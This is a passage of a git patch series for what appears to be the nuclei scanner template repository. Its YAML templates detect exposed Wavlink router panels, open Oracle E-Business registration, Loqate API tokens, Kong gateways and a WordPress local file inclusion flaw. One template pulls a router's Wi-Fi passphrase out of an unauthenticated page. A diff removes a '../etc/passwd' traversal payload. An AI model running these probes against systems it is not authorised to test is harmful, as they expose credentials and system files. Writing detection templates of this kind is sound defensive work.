b/misconfiguration/unauth-wavink-panel.yaml new file mode 100644 index 0000000000..752e478a10 --- /dev/null +++ b/misconfiguration/unauth-wavink-panel.yaml @@ -0,0 +1,44 @@ +id: unauth-wavink-panel + +info: + name: Unauthenticated Wavlink Panel + author: princechaddha + severity: high + metadata: + verified: true + shodan-query: http.title:"Wi-Fi APP Login" + tags: exposure,wavlink,unauth,misconfig,router + +requests: + - method: GET + path: + - "{{BaseURL}}/wifi_base.shtml" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<title>APP" + + - type: regex + part: body + regex: + - 'var passphraseKey12="(.*)";' + + - type: word + part: body + negative: true + words: + - 'var passphraseKey12="";' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'var passphraseKey12="(.*)";' From 25f83a70c48d2ac7740ed8ea28b4ab7a52c52df2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 15 May 2022 12:59:06 +0000 Subject: [PATCH 50/68] Auto Generated New Template Addition List [Sun May 15 12:59:06 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b56e15a13a..82aef81f32 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ cves/2021/CVE-2021-20123.yaml cves/2021/CVE-2021-20124.yaml cves/2021/CVE-2021-25075.yaml cves/2022/CVE-2022-30489.yaml +misconfiguration/unauth-wavink-panel.yaml technologies/kubernetes-operational-view-detect.yaml vulnerabilities/wordpress/seo-redirection-xss.yaml workflows/yonyou-nc-workflow.yaml From 381b8ec5fe9cac8eea54040ac010f8de8c5fcb9a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 15 May 2022 12:59:12 +0000 Subject: [PATCH 51/68] Auto Generated CVE annotations [Sun May 15 12:59:12 UTC 2022] :robot: --- cves/2022/CVE-2022-30489.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2022/CVE-2022-30489.yaml b/cves/2022/CVE-2022-30489.yaml index 0e57f0c1f5..23aaf83d2f 100644 --- a/cves/2022/CVE-2022-30489.yaml +++ b/cves/2022/CVE-2022-30489.yaml @@ -11,6 +11,7 @@ info: verified: true shodan-query: http.title:"Wi-Fi APP Login" tags: xss,cve2022,wavlink,cve,router,iot + description: "WAVLINK WN535 G3 was discovered to contain a cross-site scripting (XSS) vulnerability via the hostname parameter at /cgi-bin/login.cgi." requests: - raw: From 32dffa61d453ba73efb54971b4f8713b5580acf0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 15 May 2022 18:31:18 +0530 Subject: [PATCH 52/68] Update api-loqate.yaml --- token-spray/api-loqate.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/token-spray/api-loqate.yaml b/token-spray/api-loqate.yaml index 7ebd015c07..b5812c09ac 100644 --- a/token-spray/api-loqate.yaml +++ b/token-spray/api-loqate.yaml @@ -17,8 +17,8 @@ requests: matchers: - type: word part: body - negative: true words: - - 'Unknown key' - - 'Forbidden' - condition: or + - '"Id":' + - '"Type":' + - '"Text":' + condition: and From a67aa8f07d659b83d42c4d4b3fb51974d5a63a81 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tes5hacks@users.noreply.github.com> Date: Sun, 15 May 2022 16:13:32 -0400 Subject: [PATCH 54/68] Create oracle-misconfiguration.yaml --- misconfiguration/oracle-misconfiguration.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 misconfiguration/oracle-misconfiguration.yaml diff --git a/misconfiguration/oracle-misconfiguration.yaml b/misconfiguration/oracle-misconfiguration.yaml new file mode 100644 index 0000000000..4c3209d836 --- /dev/null +++ b/misconfiguration/oracle-misconfiguration.yaml @@ -0,0 +1,28 @@ +id: Oracle + +info: + name: Oracle E-Business Login Panel Registration Accessible + author: tess + severity: critical + description: Oracle E-Business Login Panel Registration Accessible. + reference: + - https://twitter.com/GodfatherOrwa/status/1514720677173026816 + - https://orwaatyat.medium.com/my-new-discovery-in-oracle-e-business-login-panel-that-allowed-to-access-for-all-employees-ed0ec4cad7ac + tags: oracle + +requests: + - method: GET + path: + - '{{BaseURL}}/OA_HTML/ibeCAcpSSOReg.jsp' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'Registration' + - 'Register as individual' From 14b68df4d1bb26caaa1a7891ca49db62d4ef7315 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tes5hacks@users.noreply.github.com> Date: Sun, 15 May 2022 16:33:02 -0400 Subject: [PATCH 55/68] Update oracle-misconfiguration.yaml --- misconfiguration/oracle-misconfiguration.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/misconfiguration/oracle-misconfiguration.yaml b/misconfiguration/oracle-misconfiguration.yaml index 4c3209d836..7182876ff1 100644 --- a/misconfiguration/oracle-misconfiguration.yaml +++ b/misconfiguration/oracle-misconfiguration.yaml @@ -26,3 +26,4 @@ requests: words: - 'Registration' - 'Register as individual' + - '' From 8cda6eed4d1cd84497a59d2e334c1b47e00064bf Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 16 May 2022 12:45:30 +0530 Subject: [PATCH 56/68] Update and rename oracle-misconfiguration.yaml to oracle-ebusiness-registration.yaml --- ...aml => oracle-ebusiness-registration.yaml} | 21 +++++++++++-------- 1 file changed, 12 insertions(+), 9 deletions(-) rename misconfiguration/{oracle-misconfiguration.yaml => oracle-ebusiness-registration.yaml} (78%) diff --git a/misconfiguration/oracle-misconfiguration.yaml b/misconfiguration/oracle-ebusiness-registration.yaml similarity index 78% rename from misconfiguration/oracle-misconfiguration.yaml rename to misconfiguration/oracle-ebusiness-registration.yaml index 7182876ff1..41798d61db 100644 --- a/misconfiguration/oracle-misconfiguration.yaml +++ b/misconfiguration/oracle-ebusiness-registration.yaml @@ -1,29 +1,32 @@ -id: Oracle +id: oracle-ebusiness-registration info: name: Oracle E-Business Login Panel Registration Accessible author: tess - severity: critical + severity: info description: Oracle E-Business Login Panel Registration Accessible. reference: - - https://twitter.com/GodfatherOrwa/status/1514720677173026816 - https://orwaatyat.medium.com/my-new-discovery-in-oracle-e-business-login-panel-that-allowed-to-access-for-all-employees-ed0ec4cad7ac - tags: oracle + - https://twitter.com/GodfatherOrwa/status/1514720677173026816 + metadata: + verified: true + shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200 + tags: oracle,misconfig requests: - method: GET path: - '{{BaseURL}}/OA_HTML/ibeCAcpSSOReg.jsp' - stop-at-first-match: true matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word words: - 'Registration' - 'Register as individual' - '' + condition: and + + - type: status + status: + - 200 From 4896151afd453ec3330462c0a02f45f433b9c74d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 16 May 2022 12:55:50 +0530 Subject: [PATCH 57/68] Update and rename oracle-ebusiness-registration.yaml to oracle-ebusiness-registration-enabled.yaml --- ...stration.yaml => oracle-ebusiness-registration-enabled.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename misconfiguration/{oracle-ebusiness-registration.yaml => oracle-ebusiness-registration-enabled.yaml} (95%) diff --git a/misconfiguration/oracle-ebusiness-registration.yaml b/misconfiguration/oracle-ebusiness-registration-enabled.yaml similarity index 95% rename from misconfiguration/oracle-ebusiness-registration.yaml rename to misconfiguration/oracle-ebusiness-registration-enabled.yaml index 41798d61db..e3726f8915 100644 --- a/misconfiguration/oracle-ebusiness-registration.yaml +++ b/misconfiguration/oracle-ebusiness-registration-enabled.yaml @@ -1,4 +1,4 @@ -id: oracle-ebusiness-registration +id: oracle-ebusiness-registration-enabled info: name: Oracle E-Business Login Panel Registration Accessible From b9a9ec0249388a4aea82229ee79139d7e7382649 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 16 May 2022 08:16:40 +0000 Subject: [PATCH 58/68] Auto Generated New Template Addition List [Mon May 16 08:16:40 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 82aef81f32..cea9586374 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ cves/2021/CVE-2021-20123.yaml cves/2021/CVE-2021-20124.yaml cves/2021/CVE-2021-25075.yaml cves/2022/CVE-2022-30489.yaml +misconfiguration/oracle-ebusiness-registration-enabled.yaml misconfiguration/unauth-wavink-panel.yaml technologies/kubernetes-operational-view-detect.yaml vulnerabilities/wordpress/seo-redirection-xss.yaml From d6a3f4788be2687296cca8c358f569e24a95d9b1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 16 May 2022 17:34:33 +0530 Subject: [PATCH 59/68] Update CVE-2022-1392.yaml --- cves/2022/CVE-2022-1392.yaml | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/cves/2022/CVE-2022-1392.yaml b/cves/2022/CVE-2022-1392.yaml index 4294d5f8a4..a8839ae60d 100644 --- a/cves/2022/CVE-2022-1392.yaml +++ b/cves/2022/CVE-2022-1392.yaml @@ -7,23 +7,27 @@ info: description: The plugin does not validate the p parameter before using it in an include statement, which could lead to Local File Inclusion issues. reference: - https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815 + - https://packetstormsecurity.com/files/166534/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1392 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-1392 - tags: lfi,wp-plugin,cve,cve2022 + tags: lfi,wp-plugin,cve,cve2022,wp,wordpress,unauth requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd" + - "{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout" matchers-condition: and matchers: - - type: regex - regex: - - "root:.*:0:0:" + - type: word + part: body + words: + - "failed to open stream: No such file or directory" + - "REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php" + condition: and - type: status status: From 4628a315f96f6297f5ab5c3b6961ee87186f06cc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 16 May 2022 12:08:10 +0000 Subject: [PATCH 60/68] Auto Generated New Template Addition List [Mon May 16 12:08:09 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index cea9586374..9c37f1520d 100644 --- a/.new-additions +++ b/.new-additions @@ -2,6 +2,7 @@ cnvd/2020/CNVD-2020-46552.yaml cves/2021/CVE-2021-20123.yaml cves/2021/CVE-2021-20124.yaml cves/2021/CVE-2021-25075.yaml +cves/2022/CVE-2022-1392.yaml cves/2022/CVE-2022-30489.yaml misconfiguration/oracle-ebusiness-registration-enabled.yaml misconfiguration/unauth-wavink-panel.yaml From 0a49492f2aaf5ca35d044fef5214f8cd1ad7a8b5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 16 May 2022 17:43:06 +0530 Subject: [PATCH 61/68] Update CVE-2022-1392.yaml --- cves/2022/CVE-2022-1392.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2022/CVE-2022-1392.yaml b/cves/2022/CVE-2022-1392.yaml index a8839ae60d..2b11be3bae 100644 --- a/cves/2022/CVE-2022-1392.yaml +++ b/cves/2022/CVE-2022-1392.yaml @@ -13,6 +13,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-1392 + metadata: + verified: true tags: lfi,wp-plugin,cve,cve2022,wp,wordpress,unauth requests: From 3f9ce9fb4409f66f559826896c5d0d8ee14bdbde Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 16 May 2022 18:50:40 +0530 Subject: [PATCH 63/68] Update oracle-ebusiness-registration-enabled.yaml --- misconfiguration/oracle-ebusiness-registration-enabled.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/oracle-ebusiness-registration-enabled.yaml b/misconfiguration/oracle-ebusiness-registration-enabled.yaml index e3726f8915..9b39464f64 100644 --- a/misconfiguration/oracle-ebusiness-registration-enabled.yaml +++ b/misconfiguration/oracle-ebusiness-registration-enabled.yaml @@ -2,7 +2,7 @@ id: oracle-ebusiness-registration-enabled info: name: Oracle E-Business Login Panel Registration Accessible - author: tess + author: 3th1c_yuk1,tess severity: info description: Oracle E-Business Login Panel Registration Accessible. reference: From 504d6343cc6739fee2d11044f42b4550d5262f57 Mon Sep 17 00:00:00 2001 From: Josh Larsen <2565382+joshlarsen@users.noreply.github.com> Date: Mon, 16 May 2022 12:06:55 -0400 Subject: [PATCH 65/68] Detect more Kong headers (#4406) * Detect more Kong headers * simplified template with case-insensitive word matchers Co-authored-by: sandeep --- technologies/kong-detect.yaml | 18 ++++++++++-------- 1 file changed, 10 insertions(+), 8 deletions(-) diff --git a/technologies/kong-detect.yaml b/technologies/kong-detect.yaml index dc99ead28d..9b301b7ce8 100644 --- a/technologies/kong-detect.yaml +++ b/technologies/kong-detect.yaml @@ -2,7 +2,7 @@ id: kong-detect info: name: Detect Kong - author: geeknik + author: geeknik,joshlarsen severity: info description: The Cloud-Native API Gateway reference: @@ -14,16 +14,18 @@ requests: path: - "{{BaseURL}}" - matchers-condition: and matchers: - - - type: regex + - type: word part: header - regex: - - "[Ss]erver: [Kk]ong+" + words: + - "server: kong" + - "x-kong-response-latency" + - "x-kong-upstream_latency" + - "x-kong-proxy-latency" + condition: or + case-insensitive: true extractors: - type: kval - part: header kval: - - server + - server \ No newline at end of file From 4fbdb224a060f168881edf842bc12483a6acae21 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 16 May 2022 23:35:31 +0530 Subject: [PATCH 67/68] Typo update --- technologies/kong-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/technologies/kong-detect.yaml b/technologies/kong-detect.yaml index 9b301b7ce8..6e9833bfee 100644 --- a/technologies/kong-detect.yaml +++ b/technologies/kong-detect.yaml @@ -20,7 +20,7 @@ requests: words: - "server: kong" - "x-kong-response-latency" - - "x-kong-upstream_latency" + - "x-kong-upstream-latency" - "x-kong-proxy-latency" condition: or case-insensitive: true @@ -28,4 +28,4 @@ requests: extractors: - type: kval kval: - - server \ No newline at end of file + - server